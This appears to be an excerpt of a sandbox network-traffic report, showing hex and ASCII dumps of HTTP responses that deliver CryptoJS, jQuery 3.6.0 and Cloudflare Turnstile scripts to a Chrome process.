                                                            2025-01-15 16:02:04 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                            Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                            2025-01-15 16:02:04 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                            Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                            2025-01-15 16:02:04 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                            Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                            2025-01-15 16:02:04 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                            Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.1649722151.101.2.1374436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:04 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:04 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 15 Jan 2025 16:02:04 GMT
                                                            Age: 2441451
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740064-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 1
                                                            X-Timer: S1736956925.891730,VS0,VE1
                                                            Vary: Accept-Encoding
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.1649723104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:05 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:05 UTC471INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:05 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 902716907f9c4401-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:05 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
